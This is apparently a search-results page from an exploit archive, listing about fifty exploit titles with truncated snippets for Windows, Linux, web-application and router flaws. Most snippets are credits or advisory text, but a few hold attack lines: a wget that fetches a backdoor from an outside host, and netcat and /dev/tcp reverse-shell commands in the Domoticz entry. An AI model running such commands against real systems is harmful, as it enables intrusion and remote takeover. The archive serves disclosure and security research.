41207 matches found
Microsoft Windows - Metafile .WMF Arbitrary File Download (Generator)
Microsoft Windows - Metafile .WMF Arbitrary File Download Generator / \ / WMF nDay download Exploit Generator \ by Unl0ck Research Team / \ / greetz: rst/ghc ed, uf0, fost , uKt choix, nekd0, payhash, antq , blacksecurity black , 0x557 kaka, swan, sam, nolife , sowhat, tty64 izik ; This sploit is...
Linux Kernel 2.6.9 2.6.11 (RHEL 4) - SYS_EPoll_Wait Local Integer Overflow Local Privilege Escalation
Linux Kernel 2.6.9 2.6.11 RHEL 4 - SYSEPollWait Local Integer Overflow Local Privilege Escalation / k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3 Discovered and original exploit coded Jan 2005 by sd Modified 2005/9 by alert7 XFOCUS Security Team http://www.xfocus.org gcc -o k-ra...
Microsoft Windows Plug-and-Play - Umpnpmgr.dll Denial of Service (MS05-047) (2)
Microsoft Windows Plug-and-Play - Umpnpmgr.dll Denial of Service MS05-047 2 // tested and approved /str0ke / Program: Denial of Service attack for MS UMPNPMGR PNPGetDeviceList Author: Winny Thomas Vulnerability: no length checking on passed parameter to PNPGetDeviceList in UMPNPMGR.dll Note: The...
Ethereal 10.x - AFP Protocol Dissector Remote Format String
Ethereal 10.x - AFP Protocol Dissector Remote Format String / etherealv0.10.: AFP remote format string exploit. by: vade79/v9 [email protected] fakehalo/realhalo compile: gcc xethereal-afp-fmt.c -o xethereal-afp-fmt ethereal homepage/url: http://www.ethereal.com syntax: ./xethereal-afp-fmt -spSrPanc...
ATutor 1.4.3 - content.php?cid Cross-Site Scripting
ATutor 1.4.3 - content.php?cid Cross-Site Scripting source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of...
Webhints 1.03 - Remote Command Execution (Perl) (1)
Webhints 1.03 - Remote Command Execution Perl 1 This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR:...
3Com 3CDaemon FTP - Unauthorized USER Remote Buffer Overflow
3Com 3CDaemon FTP - Unauthorized USER Remote Buffer Overflow / Added " on line 86 /str0ke / / 3com 3CDaemon FTP Unauthorized "USER" Remote BOverflow The particularity of this exploit is to exploits a FTP server without the need of any authorization. Homepage: www.3com.com version: 3CDaemon v2.0...
Solaris 789 CDE LibDTHelp - Local Buffer Overflow (1)
Solaris 789 CDE LibDTHelp - Local Buffer Overflow 1 / $Id: raptorlibdthelp.c,v 1.1 2004/12/04 14:44:38 raptor Exp $ raptorlibdthelp.c - libDtHelp.so local, Solaris/SPARC 7/8/9 Copyright c 2003-2004 Marco Ivaldi Buffer overflow in CDE libDtHelp library allows local users to execute arbitrary code...
Star Wars Battlefront 1.1 - Fake Players Denial of Service
Star Wars Battlefront 1.1 - Fake Players Denial of Service / Copyright 2004 Luigi Auriemma This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or at...
RhinoSoft Serv-U FTPd Server 3.x4.x5.x - MDTM Remote Overflow
RhinoSoft Serv-U FTPd Server 3.x4.x5.x - MDTM Remote Overflow / exservu.c - Serv-U FTPD 3.x/4.x/5.x "MDTM" Command remote overflow exploit Copyright c SST 2004 All rights reserved. Public version BUG find by bkbll [email protected], cool! :ppPPppPPPpp :D code by Sam and 2004/01/07 Revise History...
phpBB2 Gender Mod 1.1.3 - SQL Injection
phpBB2 Gender Mod 1.1.3 - SQL Injection source: https://www.securityfocus.com/bid/5342/info phpBB2 is an open-source web forum application that is written in PHP and backended by a number of database products. It will run on most Unix and Linux variants, as well as Microsoft Windows operating...
Microsoft SQL Server 7.02000 Data Engine 1.02000 - xp_displayparamstmt Buffer Overflow
Microsoft SQL Server 7.02000 Data Engine 1.02000 - xpdisplayparamstmt Buffer Overflow // source: https://www.securityfocus.com/bid/2030/info The API Srvparaminfo, which is implemented by Extended Stored Procedures XPs in Microsoft SQL Server and Data Engine, is susceptible to a buffer overflow...
Microsoft IIS 4.05.0 and PWS - Extended Unicode Directory Traversal (5)
Microsoft IIS 4.05.0 and PWS - Extended Unicode Directory Traversal 5 source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "...
Canna Canna 3.5 b2 - Remote Buffer Overflow
Canna Canna 3.5 b2 - Remote Buffer Overflow // source: https://www.securityfocus.com/bid/1445/info A vulnerability exists in the 'canna' package, as distributed with a number of free operating systems, and available for other systems. Version 3.5b2 is vulnerable. It is assumed versions prior to...
ColdFusion Server 2.03.x4.x - Administrator Login Password Denial of Service
ColdFusion Server 2.03.x4.x - Administrator Login Password Denial of Service source: https://www.securityfocus.com/bid/1314/info Due to a faulty mechanism in the password parsing implementation in authentication requests, it is possible to launch a denial of service attack against Allaire...
Cisco IOS 11.x12.x - HTTP %%
Cisco IOS 11.x12.x - HTTP %% source: https://www.securityfocus.com/bid/1154/info A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user c...
CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)
CandidATS 2.1.0 - Cross-Site Request Forgery Add Admin Title: CandidATS 2.1.0 - Cross-Site Request Forgery Add Admin Date: 2020-02-21 Exploit Author: J3rryBl4nks Vendor Homepage: https://sourceforge.net/u/auieo/profile/ Software Link: https://sourceforge.net/projects/candidats/files/Version 2.1.0...
Torrent 3GP Converter 1.51 - Stack Overflow (SEH)
Torrent 3GP Converter 1.51 - Stack Overflow SEH Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow SEH Exploit Author: boku Date: 2020-01-24 Software Vendor: torrentrockyou Vendor Homepage: http://www.torrentrockyou.com Software Link:...
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting Date: 2019-11-10 Exploit Author: Raspina Net Pars Group Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb Version: 1.93.21.19 CVE :...
Hospital Management System 4.0 - Authentication Bypass
Hospital Management System 4.0 - Authentication Bypass Exploit Title: Hospital Management System 4.0 - Authentication Bypass Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/hospital-management-system-in-php/ Version: v4....
AVE DOMINAplus 1.10.x - Authentication Bypass
AVE DOMINAplus 1.10.x - Authentication Bypass Exploit: AVE DOMINAplus 1.10.x - Authentication Bypass Date: 2019-12-30 Author: LiquidWorm Vendor: AVE S.p.A. Product web page: https://www.ave.it | https://www.domoticaplus.it Affected version: Web Server Code 53AB-WBS - 1.10.62 Advisory ID:...
Verot 2.0.3 - Remote Code Execution
Verot 2.0.3 - Remote Code Execution Exploit Title: Verot 2.0.3 - Remote Code Execution Date: 2019-12-05 Exploit Author: Jinny Ramsmark Vendor Homepage: https://www.verot.net/phpclassupload.htm Software Link: https://github.com/verot/class.upload.php Version: '; $quality = "85"; $baseurl =...
Centova Cast 3.2.11 - Arbitrary File Download
Centova Cast 3.2.11 - Arbitrary File Download Exploit Title: Centova Cast 3.2.11 - Arbitrary File Download Date: 2019-11-17 Exploit Author: DroidU Vendor Homepage: https://centova.com Affected Version: =v3.2.11 Tested on: Debian 9, CentOS 7 !/bin/bash if "$4" = "" then echo "Usage: $0...
CBAS-Web 19.0.0 - id Boolean-based Blind SQL Injection
CBAS-Web 19.0.0 - id Boolean-based Blind SQL Injection Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection Google Dork: NA Date: 2019-11-11 Exploit Author: LiquidWorm Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ Software Link:...
Alps HID Monitor Service 8.1.0.10 - ApHidMonitorService Unquote Service Path
Alps HID Monitor Service 8.1.0.10 - ApHidMonitorService Unquote Service Path Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path Date: 2019-11-07 Exploit Author: Héctor Gabriel Chimecatl Hernández Vendor Homepage: https://www.alps.com/e/ Software Link:...
Nextcloud 17 - Cross-Site Request Forgery
Nextcloud 17 - Cross-Site Request Forgery Exploit Title: Nextcloud 17 - Cross-Site Request Forgery Date: 08.11.2019 Exploit Author: Ozer Goker Vendor Homepage: https://nextcloud.com Software Link: https://nextcloud.com/install/instructions-server Version: 17 CVE: N/A Nextcloud offers the...
Apache Httpd mod_rewrite - Open Redirects
Apache Httpd modrewrite - Open Redirects Normal URLs like http://redirect.local/test will be forwared to https://redirect.local/test. But by using newlines CVE 2019-10098, we can redirect somewhere else i.e. to https://redirect.local.evilwebsite.com: curl -Ik...
TP-Link TL-WR1043ND 2 - Authentication Bypass
TP-Link TL-WR1043ND 2 - Authentication Bypass Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass Date: 2019-06-20 Exploit Author: Uriel Kosayev Vendor Homepage: https://www.tp-link.com Version: TL-WR1043ND V2 Tested on: TL-WR1043ND V2 CVE : CVE-2019-6971 CVE Link:...
HPE Intelligent Management Center 7.3 E0506P09 - Information Disclosure
HPE Intelligent Management Center 7.3 E0506P09 - Information Disclosure !/opt/local/bin/python2.7 Exploit Title: HPE Intelligent Management Center dbman Command 10001 Information Disclosure Date: 22-09-2019 Exploit Author: Rishabh Sharma Linkedin: rishabh2241991 Vendor Homepage: www.hpe.com...
Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage
Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage -----===== Background =====----- The Microsoft Font Subsetting DLL fontsub.dll is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific...
REDCap 9.1.2 - Cross-Site Scripting
REDCap 9.1.2 - Cross-Site Scripting Exploit Title: REDCap - Details: Since it is an onkeypress event, it is triggered whenever the user touch any key and since the XSS payload is stored in the project name it appears in several pages. - Privileges: It requires admin privileges to store it. -...
DameWare Remote Support 12.0.0.509 - Host Buffer Overflow (SEH)
DameWare Remote Support 12.0.0.509 - Host Buffer Overflow SEH !/usr/bin/env python Author: Xavi Beltran Date: 11/07/2019 Description: SEH based Buffer Overflow DameWare Remote Support V. 12.0.0.509 CVE-2018-12897 Contact: [email protected] Webpage: https://xavibel.com Tested on: Windows ...
Serv-U FTP Server 15.1.7 - Local Privilege Escalation (1)
Serv-U FTP Server 15.1.7 - Local Privilege Escalation 1 / CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation vulnerability found by: Guy Levin @vastart - twitter.com/vastart https://blog.vastart.dev to compile and run: gcc servu-pe-cve-2019-12181.c -o pe && ./pe / include include include int main...
HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write
HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt + ISR: ApparitionSec Vendor www.hostingcontroller.com Produ...
AUO Solar Data Recorder 1.3.0 - Incorrect Access Control
AUO Solar Data Recorder 1.3.0 - Incorrect Access Control Exploit Title: AUO Solar Data Recorder - Incorrect Access Control Date: 2019-04-16 Exploit Author: Luca.Chiou Vendor Homepage: https://www.auo.com/zh-TW Version: AUO Solar Data Recorder all versions prior to v1.3.0 Tested on: It is a...
SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)
SOCA Access Control System 180612 - Cross-Site Request Forgery Add Admin SOCA Access Control System 180612 CSRF Add Admin Exploit Vendor: SOCA Technology Co., Ltd Product web page: http://www.socatech.com Affected version: 180612, 170000 and 141007 Summary: The company's products include Proximit...
Domoticz 4.10577 - Unauthenticated Remote Command Execution
Domoticz 4.10577 - Unauthenticated Remote Command Execution !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...
Clinic Pro v4 - month SQL Injection
Clinic Pro v4 - month SQL Injection Title: Clinic Pro - Clinic Management Software Date: 03.04.2019 Exploit Author: Abdullah Çelebi Vendor Homepage: https://softwebinternational.com Software Link: https://cms.softwebinternational.com Category: Webapps Tested on: WAMPP @Win Software description: I...
Job Portal 3.1 - job_submit SQL Injection
Job Portal 3.1 - jobsubmit SQL Injection =========================================================================================== Exploit Title: NewJobPortal v3.1 - 'jobsubmit' SQL Inj. Dork: N/A Date: 25-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage:...
VMware Workstation 14.1.5 VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege Escalation
VMware Workstation 14.1.5 VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege Escalation VMware: Host VMX Process Impersonation Hijack EoP Platform: VMware Workstation Windows v14.1.5 on Windows 10. Also tested VMware Player 15.0.2. Class: Elevation of Privilege Summary: The...
VMware Workstation 14.1.5 VMware Player 15 - Host VMX Process COM Class Hijack Privilege Escalation
VMware Workstation 14.1.5 VMware Player 15 - Host VMX Process COM Class Hijack Privilege Escalation VMware: Host VMX Process COM Class Hijack EoP Platform: VMware Workstation Windows v14.1.5 on Windows 10. Also tested VMware Player 15. Class: Elevation of Privilege Summary: COM classes used by th...
Netartmedia PHP Car Dealer - SQL Injection
Netartmedia PHP Car Dealer - SQL Injection Exploit Title: Netartmedia PHP Car Dealer- SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/autodealer/ Demo Site: https://www.phpscriptdemos.com/autodealer/ Version: Lastest Tested on: Kali...
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Cross-Site Request Forgery CSRF Date: 14/01/2019 Exploit Author: Kumar Saurav Reference:...
Coship Wireless Router 4.0.0.x5.0.0.x - WiFi Password Reset
Coship Wireless Router 4.0.0.x5.0.0.x - WiFi Password Reset Exploit Title: Coship Wireless Router – Wireless SSID Unauthenticated Password Reset Date: 07.02.2019 Exploit Author: Adithyan AK Vendor Homepage: http://en.coship.com/ Category: Hardware WiFi Router Affected Versions : Coship RT3052 -...
ResourceSpace 8.6 - collection_edit.php SQL Injection
ResourceSpace 8.6 - collectionedit.php SQL Injection Exploit Title: ResourceSpace &redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=©=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0'...
Ghostscript 9.26 - Pseudo-Operator Remote Code Execution
Ghostscript 9.26 - Pseudo-Operator Remote Code Execution I noticed ghostscript 9.26 was released, so had a quick look and spotted some errors. For background, this is how you define a subroutine in postscript: /hello hello\n print def That's simple enough, but because a subroutine is just an...
BlogEngine 3.3 - XML External Entity Injection
BlogEngine 3.3 - XML External Entity Injection XML External Entity Injection Vulnerability in BlogEngine 3.3 Information -------------------- Advisory by Netsparker Name: XML External Entity Injection Vulnerability in BlogEngine 3.3 Affected Software: BlogEngine Affected Versions: 3.3 Homepage:...
Nutanix AOS Prism 5.5.5 (LTS) 5.8.1 (STS) - SFTP Authentication Bypass
Nutanix AOS Prism 5.5.5 LTS 5.8.1 STS - SFTP Authentication Bypass Exploit Title: Nutanix AOS & Prism - SFTP Authentication Bypass Date: 2018-10-27 Exploit Author: Adam Brown Vendor Homepage: https://www.nutanix.org Software Link: https://www.nutanix.com/products/software-options/ Version: 5.5.5...
School Event Management System 1.0 - Arbitrary File Upload
School Event Management System 1.0 - Arbitrary File Upload Exploit Title: School Event Management System 1.0 - Arbitrary File Upload Dork: N/A Date: 2018-10-29 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/users/janobe Software Link:...
FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure
FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure Author: Gjoko 'LiquidWorm' Krstic @zeroscience Date: 2018-10-14 Vendor: FLIR Systems, Inc. Product web page: https://www.flir.com Affected version: Firmware: 1.32.16,...